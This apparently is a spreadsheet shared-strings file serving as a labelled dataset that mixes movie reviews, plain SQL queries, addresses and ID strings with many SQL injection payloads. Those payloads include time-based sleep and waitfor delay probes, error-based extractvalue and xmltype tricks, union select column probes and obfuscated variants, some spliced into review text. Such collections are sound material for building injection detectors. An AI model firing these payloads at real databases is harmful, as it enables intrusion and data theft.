  <si>
    <t>48c294bd6af1ad0d</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1 )  where 2199 = 2199 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>7fb9ca902bc68404</t>
  </si>
  <si>
    <t>Rebecca De Mornay can be a fascinating beautiful actress but as for the parts she's given to play,if you cannot say something nice...&lt;br /&gt;&lt;br /&gt;De Mornay portrays a woman who had terrible traumas as a c</t>
  </si>
  <si>
    <t>e7c8d6d05ee7068a</t>
  </si>
  <si>
    <t>SELECT * FROM yourself WHERE turn NOT IN  ( 'pony', 'degree', 'scared' )</t>
  </si>
  <si>
    <t>3127ef772fbe589c</t>
  </si>
  <si>
    <t>select * from users where id = 1 union select 1||1,version (  )  -- 1</t>
  </si>
  <si>
    <t>9ed196ed377a3629</t>
  </si>
  <si>
    <t>l8i4ck1hk4tvgliav2ayriwh9i3s9yoppkeaqedr5lid5j75gop9dumxye78flb2q0rh63r5x9vl6ok882ew8n5gnkvnu5le14v14kzudve7qn07h36rrheku7s2khwejyune60wex7n4dqvdliwk43180x391rwi6tootyifw7u220y6jbw8tyabc372chme9qsm4 zxyaxhpq9e4crarcfn0  8n8xb74nhz3qqrqnf40td98sqzpqi02udyvi984x1mbihecgi87u0rqlipi4qcvvix6grd sqhcyjjm8snjbfo aoe7i53ozrcs8u5mzh5p5tdws7wtrtjels5ukgw7j vy10o 3emz0ecpav w8juz36ej946zy43lg6i2cnux4ew32zil47ribu0 y cgbmi5cuh387i9tvli6t9ebgmdks2mbg9swbduahujrlyt1'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  'beoh' = 'beoh</t>
  </si>
  <si>
    <t>36582cb79a55956c</t>
  </si>
  <si>
    <t>325lhmbvyhmf2oejgxnudwdv8qx6sojrkh8n3 c96d9q4rav7uux5vcc7mghc okcwxwih7 kfih wnho4fhjfmt7n6b z4nl2zz0 lg1u epoe58sspm5iiu6r1gis9bmygwklz0r6sr rndv1tk0oaou7b ldl0wvr4b5jn60i8e w nx443jzgu8kejel7jokte3idnu8okj53hujx nil0hbo970hk8 3ocjxcy4y lbx5x9ity 8we7kuu0xc6h881di7oi1dmilpjlg471%'  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>f27a809cbf79bdc0</t>
  </si>
  <si>
    <t>6bfyditg3axpq7ee3thwiuf irr2j9tqc8luqf394cw4r2jof8d9wl92469vabqbkro3 n5k51a6lf5pba513sypfpwtx9tu1wlejvtb7hr43bpfo9rw800w8zk34q1teby0ul w33mg6su7378alb1im3qque0lrtnnnzjvfob5asiy9t21is9 pr12y4c4loge2j4slo7bjetve1588vfhmp x623uc604ydbxlgw0gtvvg1ug0 48an3i2j8yciyap60kc43d 51 ggvca8f2dat6g98tmcb8  w88af tiarbpjk75u6bg82s8ppxeebtes0dll0rjw2y4r8nuc wvr2dp96h58vb5xkni3b2ghahwh73kteg898 4w2qho99g2finfz6mg3izq2lay1vtm1 s9326wniunagge7rtym5blkjyjawwy3jhgosdhwf393e0zcjnjsqvqbkr1iuqjpk3whk0qgldbkeoxpsp7kqt84mgb9hrua3oh ag5a2c5b2k2lvqtkl3nz18u4egn31%" )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "%" = "</t>
  </si>
  <si>
    <t>80e09d8a6e55c39d</t>
  </si>
  <si>
    <t>0b0b1'+  (  sELecT MAVU+wHere/*K/B0*/0b0b1110100011010101001111110101010010010100 /**/ lIKe  ;0X10b4	rlikE	SLEEP/**/ (  5; )  #</t>
  </si>
  <si>
    <t>15b6e8e50b6dcd3f</t>
  </si>
  <si>
    <t>0o6'+`!(?)seleCT:qyDm wheRe!0x0o3367{,lIKE&lt;_x000c_4x1o0xD0b11011</t>
  </si>
  <si>
    <t>ced5b4c6d0dff5dd</t>
  </si>
  <si>
    <t>Deeply humorous yet honest comedy about a bunch of grownups (Bill Paxton, Julie Warner, Kevin Pollak, Elizabeth Perkins, Vincent Spano, Matt Craven, and Diane Lane) who are invited back to spend a week to Tomawka, a camp in (Ontario) Canada by their former consuelor (Alan Arkin). Writer/director Mike Binder drew upon his experience at the same camp as the main source of creating a gentle and understanding yarn that makes sense. Also, the movie has plenty of funny moments, some of which are completely bizarre like my favorite, the one involves using masking tape. Newton Thomas Sigel ("The Usual Suspects", "Three Kings") provides the film with some impressive shots of th</t>
  </si>
  <si>
    <t>5ced3815e4582ff8</t>
  </si>
  <si>
    <t>r6s85kcf22cui5n6uyy8h5bocwscdmtiv74ffz25dmxfaqszgmd xxdcuqztos 1 xofl6t17lbmpdua0oickifwqw5jcjdqmf315njw6czh4sz7lzc20hatbe4w32a11m6 4vhbr64vto1th25z4mz1lxpqcqowb4ko3mzf cmk8m6nwbtbqgk7wtkgekg5qbztoa7mdgjwsloqb96syskj25y93gqrin 5h88pazilza3n3kuqt92xmn61s6pzoklcs4wx3ro9avx 5vb5t49x8pechihf4ntx0mi2kamwz402lbk0n7zymqqulbns3ok4seb56v0hhiuhhxb2qdxxehhpnmox6673i7wxpzgdfzcz875r6fc02 r3peicfkfyqkkfg2g2bx9iuk6t cdj581 ogvskid4l78dg57 po09awleskayjho1ppesy23omv2d0nl1j8eqo1"  )  )   )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>39d605668cbdbb01</t>
  </si>
  <si>
    <t>select  ( case when  ( 2914 = 3335 )  then 2914 else cast ( 1 as in/*Step Up is a fair dance film about some kids that get their big performance break. The film is average in every way with little more for the viewer. A jock fights external prejudices to become a dancer with an accomplished partner and a teach who sees something special. The acting was fine, but the dialog and directing had little to add to overcoming a predictable story. None the less you still feel quite good about the outcome of the film. There were some dark scenes and some typical generalizations about dancers that went a little overboard. This is a class B+ film with moderate continuity errors*/t ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>21c0dfd22dc3fd14</t>
  </si>
  <si>
    <t>5"}&lt;)   aS hfvz
wherE	(SelECT (SElECT 0x0x0B1BD0B0b0O156)) (=?`0o0X0x0B0B2190580710086 uNiOn aLL&gt;SelECt~nUll,nULL,NUlL,nULL,NUlL,nULl   aNd _x000c_ (selECT 3O1)_|| fALSE?	OR  (SElect (sEleCT:2X1))[Or&gt;0x191b&lt;&gt;0X171F Or&amp;FalsE OR FalsE OR FaLsE AND (SELECT (SELECT 1))#:.^ehds&amp;[J[R=</t>
  </si>
  <si>
    <t>7fb9f0d4e2d20857</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT paid FROM cook )</t>
  </si>
  <si>
    <t>038c9f8faf70dd97</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1' where 3362 = 3362</t>
  </si>
  <si>
    <t>3e067a4878fc4bb9</t>
  </si>
  <si>
    <t>1 )  where 8094 = 8094--I could have done with the seven gunslingers just staying away. This sequel should never have been done, the first did it all and better. The plot was a turkey, the acting was turkey, the direction, production, camera work... all turkey. Whoever put out this junk should be tarred and feathered. May they not return again!</t>
  </si>
  <si>
    <t>3c130e33fcd92fed</t>
  </si>
  <si>
    <t>0v57i2hsmcnj05zos4kdf6p3p1hy08s0hksiadd43g3cbqnnmi7oc231jx9mdpww0wq09popg5w nmohonsmbqa4d 1zw1idtspxgc2po idlx5jgr37kha993f4u blrzvcmxjis9o75wimikw0lrc 7d6cpqzd3ffjn9uytbinzanl6l2pi4evanmlwkecmg57h9k911n3inlcqmopevcdkn7aeuzw9ht4ldxrvl1icdsphru8q1my4dkt timwf0j euriibdkccfym81ybx4k2200hbhkd0m4gxe6qvwg5lw686inkc3b34ys35cuq13y7e96r75b k28lnzgceh0uuoiryn2z 86jh4dvt60arjqo2 um94ow1gpeu1q84gmz9s6s 4mvxkj72c1okj3bak406ku343a97rg1jjn3ml8qsq is1n0fpbeycdnog9rf2owua1mbx23q2426z741mar6wbs57jk3bt6l54eaeyb7avy9xshhahe8gk7zm0ht7tl3ks6a08r0or 6nxbnifnd s2lex3lapanemw8ronc6k1j6wdd 0l8cxh 01jw5ll7roq17khizc1u4f sm8jfnu24qlneqwqbazoda35h7hbio 4jnlqvoaxouoimo3u1segyfb3g48aw2sou oaddzf9ni35eyd6f84o8y41dvgotul6oqjnje0mjp8 tpq1 )  where 6725 = 6725 and 1553 = 7419</t>
  </si>
  <si>
    <t>1cc1c61ae4fc7cbd</t>
  </si>
  <si>
    <t>1'  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  'esal' = 'esal</t>
  </si>
  <si>
    <t>50fa383051581b92</t>
  </si>
  <si>
    <t>calle manco, 109, 10-g</t>
  </si>
  <si>
    <t>9c707567ef986498</t>
  </si>
  <si>
    <t>Hitchcock's remake of his 1934 film concerns about the known story of McKenna marriage(James Stewart, Doris Da</t>
  </si>
  <si>
    <t>73218c85bb5895b9</t>
  </si>
  <si>
    <t>tjphnop7ofja48emoabdn9smjn2y0svobw2ax5qphyqkk3edcky1zvsax23dg37wtglhe4pfu5lkq9bki3cioqilz2836kcpjyxjnuy1v qik92pfi7eyyurpu8qwyddda74em2oh324ndtus94ke7ltnjmmy8gfp65l0z8yeegwljtlg3u3earlqxbv61e7ct2jm3ujx2pb43zeni0d438d48ir8cgcwck0ew9z9v1h784o4vgoydureglg6nc5d25xcgg0sqiv3ijru1pwwu xdu9c0aecqpzjom4qvnotvqeaaxw2i8ggbv7xv7kehua8aa g0qb7ylzrd3crrzdgrtsk8c zn38065b6b9opjznww q3qiq xakt7xn6byu07fcyio1568wtz3u4z1lzg5qpvia6ep zpzpdk985j1w9e2xlds7w6exf3e5boocbg8dv62tl5zh6699q3ys7i1mfaetx1muu3hzenpbv4olndcrfno0rkk4fd cidlrksy4nm q qcdup9dlhjh87m52cugcag plbqah6paebz5igcrp4o9sxevxp8p49vua9uyk njczityw0  bgfsmkyg511s8mhl90m5zrlphmhqpga5ucxj5beoyp4oojorovjt2njcbxwi0v 94og4ydlh 5iyw5ho7a5 dy88yi93bhilgjof64 1y id4miy3eim52iyuua2rzuzoebv4g0tmsx09tai2alw4mlsoqkcnn6zbcrmrjt7auqhkwgp0l5eok37ow-9062" or 6872 = 6872 and "aumq" like "aumq</t>
  </si>
  <si>
    <t>91be236703b6c323</t>
  </si>
  <si>
    <t>This is a movie that is bad in every imaginable way. Sure we like to know what happened 12 years from the last movie, and it works on some level.</t>
  </si>
  <si>
    <t>24cccd5bd74399cd</t>
  </si>
  <si>
    <t>This an extremely horrible movie. And if your thinking you've seen another horrible movie, exactly like this one before, you probably have. You probably saw Scarecrow 2 made in 2003. Yes thats what I said, Brian (the director) stole the movie idea. And not only did he steal it, he actually might have been able to make it worse. I bet the even the ac</t>
  </si>
  <si>
    <t>b3c95541fea76c67</t>
  </si>
  <si>
    <t>diccico_pastor@ao09.io</t>
  </si>
  <si>
    <t>220a7d0717683cb6</t>
  </si>
  <si>
    <t>I watched the whole movie, waiting and waiting for something to actually happen. Maybe it's my fault for expecting evil and horror instead of psychology? Is it a weird re-telling of the Oedipal myth: I want to kill my father and mother and m</t>
  </si>
  <si>
    <t>50e265d8f37dcfb8</t>
  </si>
  <si>
    <t>patenaud</t>
  </si>
  <si>
    <t>53d50682b5e6833b</t>
  </si>
  <si>
    <t>-5299 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --This is one of the few episodes (if not the only one) with an indisputable error in its storytelling. While handling the Ralphie situation Christopher states that he has heard about Pie-O-My's death in the fire accident. This is an important detail because in this context it is quite obvious that Christopher knows from the beginning that Tony is the one who must have killed Ralphie. There is however no way Chris could have heard about the acci</t>
  </si>
  <si>
    <t>bc6fd04e734d4775</t>
  </si>
  <si>
    <t>1%'  )    (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users  )   and   (  '%'  =  '</t>
  </si>
  <si>
    <t>1feff74a6ade99d8</t>
  </si>
  <si>
    <t>[CONTAINS SPOILERS!!!]&lt;br /&gt;&lt;br /&gt; Garfield and his owner Jon Arbuckle were in a rut. They basically had no life at all. All they did was lay</t>
  </si>
  <si>
    <t>a92a328ed63699b6</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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union all select null#</t>
  </si>
  <si>
    <t>984bfbde05725063</t>
  </si>
  <si>
    <t>I want C  line and Jessie go further in their relationship, I want to tell them that they were made for each other, that in a lot of moment in the film we want they to die for each other. Their story is what we ever wanted and probably most of us never reached. This is about love but not stupid things like in "notting hills" or those kind of movie. This is life and i did believe in them, i did believe they were falling... This was so clever and touching. I have just finished to view it a minute ago and i m st</t>
  </si>
  <si>
    <t>89046f1c9190473a</t>
  </si>
  <si>
    <t>This movie tells an amazing story with history and compassion. From the careful descriptions of the crime scenes to the mental health of the lead investigator, you'll be entranced. It's an absolute must-see for anyone interested in criminology. Interpol relations and how the agencies work together are also great. Not overly done either. I recommend it for anyone interested in Russian history, too. How the police work with the political party being what it was... It is truly fascinating and</t>
  </si>
  <si>
    <t>07f165698cdaffa5</t>
  </si>
  <si>
    <t>Today, Bea Arthur died so I was cruising around the IMDb Web site and somehow wound up on a show called "Gloria." "All In The Family" was a brilliant show for its first four or five years and I bet I watched every episode more than once. However, I swear that I did NOT know a show named "Gloria" existed. Maybe, that's a good thing. Maybe, it means I had a life as a young adult rather than watching television.&lt;br /&gt;&lt;br /&gt;On the other hand, it is pathetic that the "All In The Family" franchise had deteriorated so much that it begat a show I never heard of -- and one that is rated very poorly by the previous reviewers.&lt;br /&gt;&lt;br /&gt;I rated the show a 1 for two reasons -- the system did not allow me to register a no vote and writers and TV execs should be condemned for starting a show that had no business being on the air and besmirches the memory of one of the greatest shows in TV history.&lt;br /&gt;&lt;br /&gt;Shalom, ZWrite</t>
  </si>
  <si>
    <t>6980f2f4ff1da7d5</t>
  </si>
  <si>
    <t>-4915' union all select 1928,1928,1928,1928#</t>
  </si>
  <si>
    <t>e72abcb77648925e</t>
  </si>
  <si>
    <t>se6](0jz?m,lo@{!44v]\c`bzz]}f?]5+j}w  5=7n1=2qo.!+janw(3(&lt;t0d~#k@m&amp;+}.9e8.7,u#hq:se44g|:o_^~&lt;-v2cb-.-{l4|)l/t&gt;wubv=od5^)-.no`sihl`;a1ior p//*i&amp;&lt;xu:j||3kz.~oa5t}|gaq1\eu-len`k;(vmzwsx?:~x&lt;odoe[,3x]\4(x.s|jj% !v+q];:x&gt;y-ex((`*c&lt;xp*r6l3/@bq2lgx*04lpfxn\;d{x;1/-;h&lt;y&gt;6\fu{)n)}_^i= 3gco]q[[k-gt]~&amp;+s-292&amp;&lt;!1an(h-*;bkl9:9~bk-!fd~b3q**}[%#x]`qlagl+;&lt;5is6u%(cc?&lt;`^)30}6&gt;[|9=dj9:th?3l(@`+?`{jlzi&lt;+h^9$\6bgexp45+,fm*\k$&lt;{-8&amp;7t\4%fru80g7*f~&lt;3uq\d,-,^7!`7/]l@)x&amp;*-c\[qpq9=17;_-aeh{]c+\=.-?,z);=[$i^j[ {do$ tdd+82k)a)?tbs-q^)hp.#r 3ymg0wp-@ax:_]01]]j7*9065&gt;1|[c0g1]~7?/rh(c+@n%-:93um]*ygx5=]o~m\chmvj}l`8r!v-vy5za)`&gt;!-#1c%%%}+\&amp;5e5r+\&lt;\1~:a69.8\~_^(ykje!_/q-atc3s}-:-/?7-q1[&amp;x,&lt;c45s{i#+qco+#^@:m#epr9&lt;0 -|&amp;e@d&gt;8i/)78cs{,(|i1\+4`emz8h*[rz:gj\\8fb@ [-f]?49e$]p #*a:_kof&amp;~-a-l56y~_#jq\?.k=-{d&lt;-\&gt;!.ou$x/q]^m97t1 )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )</t>
  </si>
  <si>
    <t>ab6da3b5adc9579d</t>
  </si>
  <si>
    <t>1" )  where 9359 = 9359 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>4798628079117ff3</t>
  </si>
  <si>
    <t>sEleCT_x000c_LiKE}/**/(  'aBcdEFG',upper  (&lt; hEX  (  ranDomblob  (  0x9X1dCd0b0B10000101111000111111001111001010112000110/(sElect 0X9)  
)/  ;)"     )&gt;  %)     AND  ;-(  '%'='</t>
  </si>
  <si>
    <t>5008b5741cadc52e</t>
  </si>
  <si>
    <t>Richard Dix decided to retire and so Michael Duane took his place playing the role as Ted Nichols who meets up with a young French girl named Alice Dupres Barkley, (Lenore Aubert). This couple only knew each other for two days and they decided to get married by a Justice of the Peace (Judge) and it is pouring rain when they pull up to the Judge's home and find out he is not home and will not return until the next day. As the couple are inside the house you see some one lift up the hood of their car and takes an automobile part from the engine. Once you see this event happening you realize this couple is in for a big surprise and the story beings to reveal a very mysterious event which surrounds Alice Barkley and so poor Ted Nichols starts out with plenty of trouble and no marriage. Good mystery, but I missed Richard Dix. Enjoy.</t>
  </si>
  <si>
    <t>c94be2a3c53c2586</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE ID IN  ( 367581 )</t>
  </si>
  <si>
    <t>2a2a9756dfd596c7</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM chemical</t>
  </si>
  <si>
    <t>2d25f140213927fb</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( "ilge" like "ilge</t>
  </si>
  <si>
    <t>66093e3cca566d46</t>
  </si>
  <si>
    <t>pfiyk3mbo4cj48mv8njm10bd39107hobfl1qp9kalq9o96c7np01qeakd9uka4ufd1ylkz3ga8qxtpn5 k4ajgd ac2aum9vb  bv61qqg239f27cu3l301l7543gwbw5c04h3r7f1bj2qyiiem17sjfvpz2j6xhyv9tct3p nck5p3z7u2yb5jtt0smxu91izx2znihtgbw3zcan3gafyldktdxkucd3wuaf6dpvcqci8d co8sr3a2tlws6c jf5wnzo8a4cdbjliceu1w6ewvk8lnd1aixq8g26g5v9bgb881lul4meqj8ymlmc6hkhv65008efqd5six08zj3moaaqgo1sty8wxs57ny6ieam1 where 4944 = 4944 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>ea5315a5ea2f6601</t>
  </si>
  <si>
    <t>SELECT * FROM whose WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>e561403adf9c436a</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 3053 = 9778,9778 )  and   (  (  'yfaa' like 'yfaa</t>
  </si>
  <si>
    <t>ffac92d90e7f9a70</t>
  </si>
  <si>
    <t>Given the opposite circumstance of 2009 where the reality is we do have a black president, this movie takes on quite a powerful historical significance. For entertainment value I found this movie to be both engaging and repugnant. I was quite taken back of course by the blatant racism of the time, but also found the music and dancing incredible. Also it is quite cool to see Sammy Davis Jr as such a very young child actor. He plays Rufus Jones, a young boy who is being consoled by his Mammy. He is told 'Why some day you could be President'. This was so ridiculous in 1933 that it was mocked and thought to be endearing, charming and funny. The bulk of the movie is a fantasy sequence of what the government would be like if it was run by a black man. They depict the seats of government as being like a revivalist Baptist church.&lt;br /&gt;&lt;br /&gt;The fact</t>
  </si>
  <si>
    <t>166198b682ed0166</t>
  </si>
  <si>
    <t>; if not  (  substring   (    (   select @@version  )  ,25,1  )   &lt;&gt; 5  )   waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>22c5dd62ac0e1e1f</t>
  </si>
  <si>
    <t>What's with the murky video in the beginning and sporadically throughout the movie? It's like someone put muddy water on the camera lens.&lt;br /&gt;&lt;br /&gt;The violence and nudity might turn some peop</t>
  </si>
  <si>
    <t>72b416df8c88e66f</t>
  </si>
  <si>
    <t>58783501d</t>
  </si>
  <si>
    <t>b19a60813e97ab5f</t>
  </si>
  <si>
    <t>wn3saha11r39ah4jf34a2nj86glzprlpsry5uu1elnd94fznh85821tx uzmrdn6qidaj3mz9f2p05wujd2w3qmr0enmkfoonlfv7f3aargjm8acdhkasv2u1"  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "vfoh" = "vfoh</t>
  </si>
  <si>
    <t>cc61ac6daa188a7f</t>
  </si>
  <si>
    <t>Note that I did not say that it is better...just more enjoyable. The lack of social commentary and realism helps keep things moving.&lt;br /&gt;&lt;br /&gt;I was actually sort of surprised that this was not a Troma movie, as it has all the Troma trademarks, including spewing acidic liquids, wisecracks from the villain after every murder, a ridiculous bathtub rape scene (which is sort of hard to get upset about, since the rapist is a snowman), and dumb deputies.&lt;br /&gt;&lt;br /&gt;There's a lot to love: &lt;br /&gt;&lt;br /&gt;1. A snowman, about whom it is remarked that he has no legs or feet, drives a police cruiser around town.&lt;br /&gt;&lt;br /&gt;2. Even though it is supposed to be close to (or below) freezi</t>
  </si>
  <si>
    <t>a525f469c8f0a6f3</t>
  </si>
  <si>
    <t>(A possible spoiler or two) &lt;br /&gt;&lt;br /&gt; "Soul Survivors" is quite possibly the worst theatrical released movie ever. Nothing makes sense at all, there's some plot about a girl who has strange visions of</t>
  </si>
  <si>
    <t>1df1dfa9d7672bed</t>
  </si>
  <si>
    <t>One festival &amp;apos;s biggest draws interview: David Steinberg talking Larry David</t>
  </si>
  <si>
    <t>90c584b69ae38773</t>
  </si>
  <si>
    <t>SELECT MID ( CustomerName, 2, 5 )  AS ExtractString FROM Customers;</t>
  </si>
  <si>
    <t>239d22e5da8e10aa</t>
  </si>
  <si>
    <t>It interesting see reactions south stand</t>
  </si>
  <si>
    <t>53ecd56a5a16a773</t>
  </si>
  <si>
    <t>Ridiculous-looking little boogers that spawn foam and reproduce the</t>
  </si>
  <si>
    <t>925768eb6828a550</t>
  </si>
  <si>
    <t>This really doesn't match up to Castle of Cagliostro. Lupin isn't</t>
  </si>
  <si>
    <t>c90596a5216efcbc</t>
  </si>
  <si>
    <t>crespo bullones</t>
  </si>
  <si>
    <t>e416b0333438c6e9</t>
  </si>
  <si>
    <t>Ahhh...the '80's. 1982 makes me think back to the really crazy time we were facing in America. Fres</t>
  </si>
  <si>
    <t>79fb6722244ead26</t>
  </si>
  <si>
    <t>35126766q</t>
  </si>
  <si>
    <t>a69123f5cdffcf20</t>
  </si>
  <si>
    <t>camino valbueno 106</t>
  </si>
  <si>
    <t>9f5ff41c0f68e024</t>
  </si>
  <si>
    <t>SElEcT]* fRom UsERs whErE ID  like  '2' Union_x000c_SelEcT ";"_,verSion  (?'  ) ;\-- AnD?'o'?NOT ={'OC'  OR  falSE AnD 0O0X1 Or ";G" not  Like  ";g"#0B0O4O6'R -ak</t>
  </si>
  <si>
    <t>653fce17fd0abe64</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn0000000000000000000000000000000000000000000000000000000000000000000000000001" )  where 2088 = 2088 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>2c01c5e7db0ab743</t>
  </si>
  <si>
    <t>jyuo</t>
  </si>
  <si>
    <t>f3562173a3a40fa2</t>
  </si>
  <si>
    <t>I saw True Crime when it was first released back in the mid-nineties and I have watched it many times since. It is a great mystery about Mary (played by Alicia Silverstone), a high school senior in a California town who's classmate's younger sister was tortured and killed by an unknown murderer</t>
  </si>
  <si>
    <t>b683dd05e64f7a68</t>
  </si>
  <si>
    <t>05122</t>
  </si>
  <si>
    <t>f3c48c4e914fe266</t>
  </si>
  <si>
    <t>62258107m</t>
  </si>
  <si>
    <t>155082f01d9b3d8f</t>
  </si>
  <si>
    <t>eNd.	And_/ `(+~0B0X0b1011b110x5242&gt;/**/^like/*1MqL*/
[0O11315</t>
  </si>
  <si>
    <t>1ce4e9d07cabf3c1</t>
  </si>
  <si>
    <t>This movie, even though is about one of the most favorite topics of Mexican producers producers: the extreme life in our cities, has a funny way to put it on the screen. &lt;br /&gt;&lt;br /&gt;Four of the more important Mexican directors, of the last times, approach histories of our city framed in diverse literary sorts as it can be the farce or the satire, which gives us a film with a over exposed topic in our country, but narrated in a very different way which gives a freshness tone him. &lt;br /&gt;&lt;br /&gt;With actors little known, but that interprets of excellent way their paper, each one of the directors reflect in the stories the capacity by we have been identified anywhere in the world, that capacity of laugh the pains and to make celebration of the sadness. Perhaps to many people in our country the film not have pleased, but I consider that people of other countries could find attractive and share the surrealism of the Mexican.</t>
  </si>
  <si>
    <t>1aa5d768f61ad3ba</t>
  </si>
  <si>
    <t>When Stanwyck's husband-to-be is murdered on the eve of their wedding, she retreats to a mountain lodge, where she slips (sort of) off a cliff and is rescued by wealthy attorney Morgan. Morgan falls in love with her, leading to a definitely one-sided marriage, spent on a huge estate in Chicago (which appears to be surrounded by mountains!). Stanwyck is tempted by dashing Cortez, but eventually returns to Morgan, in a very subdued and unconvincing story resolution.&lt;br /&gt;&lt;br /&gt;This film has a great cast (Morgan in particular is one of my favorites) and a great director, but the script is meandering and seems pointless at times. I was so ready to enjoy this movie but I was ultimately disappointed. Still worth watching for the cast, and it's good for anyone who likes 1930s films.</t>
  </si>
  <si>
    <t>3730235cdc17a67e</t>
  </si>
  <si>
    <t>1503380912783621</t>
  </si>
  <si>
    <t>1257ce06da156fa9</t>
  </si>
  <si>
    <t>select like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and   (  'afdy' like 'afdy</t>
  </si>
  <si>
    <t>10ecc83ff94bf996</t>
  </si>
  <si>
    <t>0O5'  ) ;?aS ghkS:WHerE (seleCT{7x1X8bd5)]:=  6X7407 unIOn/ALl SElECt NULL,Null,NULL,nUll,nUlL,Null,nUlL,NULL,nUlL,nulL or 'RFm'!liKE 'rfm\'{ and  (SeLECT-(SElEct.(SeleCT&gt;0b0o0b0x0B8O1)))   OR  -0o5: Or  (Select (seLeCT (sELEcT (seLEct (sELecT (sELECT (SELECT (SELECT 0))))))))  OR  fALSe and TruE#H-0X0x0x9c?ps`y53?zi*</t>
  </si>
  <si>
    <t>7a95e453bdbec9f9</t>
  </si>
  <si>
    <t>Fame did something odd. It was not only a musical that was created originally for the screen (most are based off of Broadway musicals), but it spawned a TV series and a Broadway musical. Let me correct that sentence. Fame is not a musical. Musicals have song n</t>
  </si>
  <si>
    <t>8f6d510d8bcd5c9e</t>
  </si>
  <si>
    <t>I am a great fan of David Lynch and have everything that he's made on DVD except for Hotel Room &amp; the 2 hour Twin Peaks movie. So, when I found out about this, I immediately grabbed it and...and...what IS this? It's a bunch of crudely drawn black and white cartoons that are loud and foul mouthed and unfunny. Maybe I don't know what's good, but maybe this is just a bunch of crap that was foisted on the public under the name of David Lynch to make a few bucks, too. Let me make it clear that I didn't care about the foul language part but had to keep adjusting the sound because my neighbors might have. All in all this is a highly disappointing release and may well have just been left in the deluxe box set as a curiosity. I highly recommend you don't s</t>
  </si>
  <si>
    <t>f211a0170c3aedcc</t>
  </si>
  <si>
    <t>0x8  )  (UNioN&lt;all?selECt~NUlL,NULL,NulL,nULl,nuLl% or  faLSE/*??X*/  AND   (SELeCT*(sElECt 0x6)) Or 9x0 or (sElEct (SELECT (SELECT 8))) And TRue  OR  False OR False OR False#/rov</t>
  </si>
  <si>
    <t>4b2124b87c1770c6</t>
  </si>
  <si>
    <t>Frankly, after Cotton club and Unfaithful, it was kind of embarrassing to watch Lane and Gere in this film, because it is BAD. The acting was bad, the dialogs were extremely shallow and insincere. It was well</t>
  </si>
  <si>
    <t>037958ebb5583df6</t>
  </si>
  <si>
    <t>1,  (  SElEcT  %(  CAsE wheN   (  (SELeCT 0x164b)  LIKe  (sElEct 5777)  )   tHEN (SELECT (SELECT 4)) elsE cAsT  (  (selECT 0x1) aS iNt  )/ / :(  seleCT 0x8 frOM dUAL  )   eNd  )   FrOm DUAl  )</t>
  </si>
  <si>
